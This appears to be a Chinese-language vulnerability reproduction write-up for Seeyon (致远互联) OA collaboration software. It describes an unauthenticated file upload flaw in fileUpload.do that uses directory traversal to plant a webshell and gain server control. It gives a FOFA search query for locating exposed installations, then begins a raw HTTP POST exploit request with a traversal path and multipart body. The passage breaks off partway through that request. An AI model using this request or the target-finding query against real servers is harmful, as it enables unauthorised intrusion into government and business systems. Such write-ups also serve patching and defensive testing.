0x01 产品简介
致远互联OA是一套办公协同管理软件,主要面向政府行业和中小企业,提供信息化解决方案。
0x02 漏洞概述
致远互联OA fileUpload.do接口处存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限。
0x03 测绘语句
fofa: title="协同管理软件 V5.6SP1"
0x04 漏洞复现
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=00content0boundary00
--00content0boundary00
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions"
png
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Dispos